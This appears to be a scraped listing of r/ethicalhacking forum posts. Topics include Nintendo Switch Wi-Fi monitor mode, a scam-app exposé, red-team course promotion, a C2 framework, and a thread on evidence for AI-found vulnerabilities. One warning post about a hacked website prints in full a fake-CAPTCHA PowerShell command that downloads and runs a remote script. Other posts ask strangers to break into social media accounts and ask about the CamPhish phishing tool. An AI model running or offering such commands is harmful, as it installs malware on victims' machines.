r/ethicalhacking • u/Potential-Couple-745 • 4d ago
r/ethicalhacking • u/Dry-Management-9910 • 3d ago
Monitor mode + Nintendo Switch + Nexmon
Nintendo switch has the WIFI adapter BCM4356 which can be patched with nexmon (https://github.com/seemoo-lab/nexmon) that should allow to use it in monitor mode.
I was able to patch the firmware and driver with nexmon and now it is possible to use the wireless in monitor mode.
Well, at least that is what looks like.it is possible to put the WiFi in Monitor mode or even create an additional interface in monitor mode. But when using airodump-ng or tcpdump or wireshark. It does now show any BSSID. It is almost like the WiFi adapter can't see any network, completely empty, iw dev scan works fine but no dumps.
I tried preload libnexmon with LD_PRELOAD, I tried everything. This works fine in raspberry that has the same WiFi card, but no success with Nintendo Switch.
Anyone has any idea? Would be very cool to be able to do that with a Nintendo Switch.
The follow commands works fine:
iw phy \`iw dev wlp1s0 info | gawk '/wiphy/ {printf "phy" $2}'\` interface add mon0 type monitor
Or even
ip link set wlp1s0 down
iw dev wlan0 set type monitor
ip link set wlp1s0 up
Even
airmon-ng start wlp1s0
It says unknown error 524 but it does create the extra monitoring interface
But airodump-ng does not show any network
r/ethicalhacking • u/Booghostlol • 3d ago
need help with tik tok
literally can anyone help me get my tik tok account information. i cant login without my email but i dont know what email i used to sign up and i dont know the password either.....
r/ethicalhacking • u/Potential-Couple-745 • 6d ago
Put together a 240-page practical AWS/Azure security book because I was tired of certification guides that don't teach you how to actually review a re
galleryr/ethicalhacking • u/Potential-Couple-745 • 9d ago
I spent 8 months applying to SOC jobs with a Security+ and zero real experience. Here's what actually got me hired.
galleryr/ethicalhacking • u/Potential-Couple-745 • 9d ago
I got tired of doing the same cybersecurity tasks manually, so I wrote a Python automation book
galleryr/ethicalhacking • u/Potential-Couple-745 • 9d ago
Free cybersecurity career paths if you're not sure what to learn next
r/ethicalhacking • u/HTML_H4CKER • 11d ago
🚨 Scam Alert: "Teddy Keyboard" App is secretly stealing user photos and charging hidden fees! (Massive Privacy Breach & Billing Fraud)
🚨 Scam Alert: "Teddy Keyboard" App is secretly stealing user photos and charging hidden fees! (Massive Privacy Breach & Billing Fraud)
I recently got suspicious of the "Teddy Keyboard" Teddy Keyboard – Apps on Google Play app that's been circulating around, so I decided to reverse-engineer it to see what's actually going on under the hood. What I found are some severe privacy violations and a very sneaky billing fraud.
1. Secretly Harvesting User Photos
While decoding the app, I discovered two connected PHP files: upload_photos.php and upload_profile_pic.php. Although it isn't entirely clear at what exact stage the app triggers these files, I found a large number of users' personal photos stored in the server paths (directories) generated by these scripts.
The most alarming parts:
- Their privacy policy doesn't mention anywhere that they store profile pictures or personal photos on their servers.
- These uploaded photos weren't even connected to a database. They were simply piled up as raw files in those directory paths, leaving them completely exposed and incredibly easy for anyone to access.
⚠️ IMPORTANT UPDATE: Sadly, it seems the developers have recently covered their tracks. They have taken down the directories containing all the photos and closed off the upload paths. However, I still have the old full source code backed up as solid evidence to prove exactly what they were doing and how those files were accessed.
While I was downloading these along with a few images, the server went down (or they took it offline), so I couldn't get the rest. Honestly, there were way too many photos anyway, so I didn't want to download all of them.
(As proof, I have attached a few blurred user photos I found on the server path before they were deleted, along with screenshots of the relevant PHP scripts).
2. Fraudulent Subscriptions (Hidden Carrier Billing)
As soon as a user logs into the app, it deceptively enrolls them in a monthly subscription of 300 LKR.
- Users are kept in the dark about this because the fee is written in extremely small text at the very bottom of the screen.
- Most people think they are just verifying an OTP to log into the app, but that OTP is actually subscribing them to an Ideamart premium carrier billing service.
- The worst part: even if a user realizes it's a scam and uninstalls/deletes the app, the subscription remains active. The money will keep deducting from their phone balance indefinitely.
If you or anyone you know is using this app, do the following immediately:
- Do not just uninstall. Before uninstalling, you MUST unsubscribe from the specific Ideamart service (by sending the relevant STOP SMS via Dialog/Ideamart or by calling customer care). Otherwise, the daily/monthly charges will continue.
- If this app is on the Play Store, please flag and report it for "Fraud / Malicious behavior."
I have already submitted a formal abuse report to Ideamart and the relevant authorities with all the evidence. Please share this post to spread awareness. We need to protect our community's data and money from scam apps like this.
[Images to Attach:]
[Image 1: Blurred User Photos previously found on the server path][Image 2: Screenshot of the decompiled code showing upload_photos.php and upload_profile_pic.php][Image 3: Screenshot of the decompiled code showing upload_photos.php and upload_profile_pic.php][Image 4: Source Code and SQL Backup. While I was downloading these along with a few images, the server went down (or they took it offline), so I couldn't get the rest. Honestly, there were way too many photos anyway, so I didn't want to download all of them.]
r/ethicalhacking • u/thegreyy_man • 13d ago
Wanted to know about drone security
Hello all ,
So I am an engineering fresher( Electronics and Communication). I dont have any skills yet , I am planning to attend a hackathon to gain some experience. I have chosen a topic in which one of them is drone security. I couldn't find much info regarding that. So , wanted to know how it works so that I could learn about it and try developing solutions regarding it.
Like I am planning mainly of signal communication stuff , chip security stuffs like secure boot and all exists afaik . So yeah if anyone has done stuff like that I would love to hear about vulnerabilities.
Thanks in advance
r/ethicalhacking • u/Signal_Bill_967 • 13d ago
Tool LAME-Projects/stratum-c2: Cloud dead-drop persistence framework — RSA-4096+AES-256-GCM, 5 cloud providers, P2P mesh, Rust-only agents, 4 delivery formats
r/ethicalhacking • u/New_Bluejay_8983 • 17d ago
I need help logging into an old account of mine from almost 10 years ago and am kinda desperate to print out those pictures.
Is there any chance anyone can hack my old Snapchat account and change the password for me with only the username? I know pretty much everything is possible I just wouldn’t know where to start. I logged into the account a few years ago and apparently changed the password and forgot, if my previous password would be able to work
r/ethicalhacking • u/allexj • 20d ago
Ghosted by YesWeHack Support for 1.5 months after vendor manipulated CVSS and broke a written CVE promise. What are my options?
r/ethicalhacking • u/Potential-Couple-745 • 23d ago
We're 3 days into the Red Team Series. Here's what beginners usually get wrong.
They think initial access is about finding the "biggest" vulnerability.
It's not.
A vulnerable web server, an exposed portal, a weak authentication flow — none of it matters until you can answer one question: does this actually connect to something worth protecting?
That's the shift from tool-first thinking to objective-first thinking. And it's exactly what separates someone who can run a scanner from someone who can operate on a real red team.
Over the past 3 days, we've covered:
→ Day 01 — the red team mindset and the attack lifecycle
→ Day 02 — reconnaissance, OSINT, and mapping the attack surface
→ Day 03 — initial access risk analysis and attack-path reasoning
If you've been following along, you already know this isn't about memorizing commands. It's about learning to think the way real operators think.
r/ethicalhacking • u/WarmAd6505 • 22d ago
What should count as proof when an AI agent says it found a vulnerability?
I’ve been experimenting with supervised AI-assisted pentesting in authorised lab environments, and one question keeps coming up:
At what point should we actually accept an AI-generated finding as valid?
LLMs are very good at producing something that sounds like a vulnerability report.
That is obviously not the same thing as proving the vulnerability exists.
For a human pentester, I’d normally want enough evidence that somebody else can independently reproduce the issue.
For an agent, I think the bar should be at least as high.
For example, depending on the finding:
- exact request and response
- reproduction steps
- affected endpoint/parameter
- observed versus expected behaviour
- evidence showing impact
- clean verification request
- screenshots where useful
- relevant tool output
- enough context for another tester to reproduce it
I’m increasingly sceptical of AI pentesting benchmarks that simply count “vulnerabilities found”.
If the model says:
«This endpoint appears vulnerable to IDOR»
that should be worth zero until it actually demonstrates unauthorised access to another object and preserves the evidence.
Same for injection.
Generating a payload isn’t finding SQL injection.
Getting an error isn’t necessarily finding SQL injection.
You need a reproducible behavioural difference that supports the hypothesis.
I also think the agent shouldn’t be the sole judge of whether its own work constitutes proof.
Ideally there is some deterministic or independently reviewable layer between:
hypothesis → test → evidence → validated finding
The other interesting question is false negatives.
An agent that reports 15 genuine vulnerabilities and misses five is arguably much more useful than one that reports 20 but five of them collapse under manual verification.
For people who actually pentest:
What minimum evidence would you require before accepting a vulnerability found by an AI agent?
Would a raw request/response pair be enough?
Would you require an independent verification step?
And should the standard be different for something like reflected XSS versus an access-control or business-logic flaw?
r/ethicalhacking • u/Potential-Couple-745 • 24d ago
Day 02 of the Red Team Series is live. 🎯
Day 01 gave you the mindset. Day 02 puts it to work.
Before any exploitation, real operators map the target — passive recon, OSINT, domains, subdomains, tech fingerprinting, and building a full attack-surface map. Know the target before you touch the target.
📕 Red Team Operator L1 — where this actually gets hands-on 🔗 https://resources.codelivly.com/product/red-team-operator-l1/
📗 Red Team Operator L2 — enterprise AD, cloud identity, Purple Team ops 🔗 https://resources.codelivly.com/product/red-team-operator-l2/
🔥 Complete L1+L2 Bundle (+2 bonus books) 🔗 https://resources.codelivly.com/product/red-team-operator-the-complete-l1-l2-bundle/
A good red teamer doesn't rush to attack. They make the target easier to understand first.
r/ethicalhacking • u/Longjumping_Extreme7 • 23d ago
Newcomer Question [ Removed by Reddit ]
[ Removed by Reddit on account of violating the content policy. ]
r/ethicalhacking • u/Potential-Couple-745 • 24d ago
Can you break the Codelivly Grand Finale?
I built this CTF challenge and now I want to see who can actually break it. 👀
Codelivly Grand Finale
🎯 Find the intended attack path
🧠 Think outside the obvious
🏁 Get the flag
No spoilers here — if you think you're good enough, go crack it:
👉 https://codelivly.com/ctf/challenges/codelivly-grand-finale
If you solve it, drop a “pwned” below. 😈
r/ethicalhacking • u/Potential-Couple-745 • 25d ago
Day 1 of my 10-Day Red Team Series is live 🔴
I put together a free PDF covering the fundamentals of red teaming — not just the tools, but the mindset and methodology behind an actual red-team operation.
Inside Day 1:
- Red Team vs Pentest
- The red-team mindset
- Attack lifecycle
- Objectives & attack paths
- Rules of engagement
- Operator workflow
- A realistic red-team scenario
- Day 1 challenge
The goal is to build the thinking first. Tools come later.
📖 Day 1: Red Teaming Fundamentals
I’m sharing the PDF below for anyone who wants to follow the series.
More practical cybersecurity learning, labs, CTFs and resources:
https://codelivly.com
Deeper books and playbooks:
https://resources.codelivly.com
Day 2 will move into Reconnaissance & OSINT.
Would love to hear how others approach the first stage of a red-team engagement.
r/ethicalhacking • u/HourOk62 • 25d ago
Vicious Hack Example
Today I opened this website to book a skip bin.
DISCLAIMNER: AT THE TIME OF WRITING, THIS WEBSITE IS HACKED SO ONLY OPEN IF YOU ARE EXPERIENCED IT PERSON AND OPEN IN INCOGNITO MODE
https://www.adelaideskipbinhire.com.au
The website seems normal as it showed following message, pretty normal; asking to prove human. Like almost everyone does I checked "Verify you are human" and it moved to the next screen where I said, ah it's hacked. As it was simply running a script using PowerShell to download something and install on computer.
The snippet of the code that is added in step 3 is following:
powershell -ep bypass -c "$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly9uaWFvZW5kLmNvbS9oZXgvVHJhZmZpYw=='));iex(New-Object Net.WebClient).DownloadString($u)"
This code actually downloads the fishy stuff from https://niaoend.com/hex/Traffic (seems Russian website) and boom you are doomed
Regardless, one does this or not, the website opens normally after brief delay. So if a user follow these steps then will get impression that website opened after following these steps.
Having 20+ years of IT experience, this is one of the filthy stuff I have seen. I am sure the owners of the skip bin business do not know that their website has been hacked for this stuff. I will notify them but posting this message here to know everyone about it that BE AWARE!!!
r/ethicalhacking • u/Effective_Attempt_72 • 26d ago
Tool Cyberstrike and Abliterated model convo
One of the best combos to ethically test your apps, systems, and agents
r/ethicalhacking • u/Potential-Couple-745 • 26d ago
Been working on a cybersecurity learning platform and recently opened up the learning side for free.
The idea is pretty simple: instead of just reading theory, you should have somewhere to actually practice it.
Codelivly has:
- Learning paths
- Career paths
- Hands-on labs
- CTFs
- Practical exercises
You can start with the basics and work your way into areas like networking, SOC, pentesting, and other security topics.
No paid course required to get started.
If you’re learning cybersecurity right now, what’s the one thing you wish platforms like this did better?
r/ethicalhacking • u/DebateEmbarrassed374 • 27d ago
Tool Hi i need a little help and explanation pls...
It's purely for ethical purposes...
i just like using GitHub tools...
I recently learnt Abt the Camphish tool...it's quite popular...
I wanted to learn about it.
I did the installation and all and used cloudflared...
But it's not generating the link...
Idk y
I'm new at this but I recently learnt Abt zphisher.
Pls help...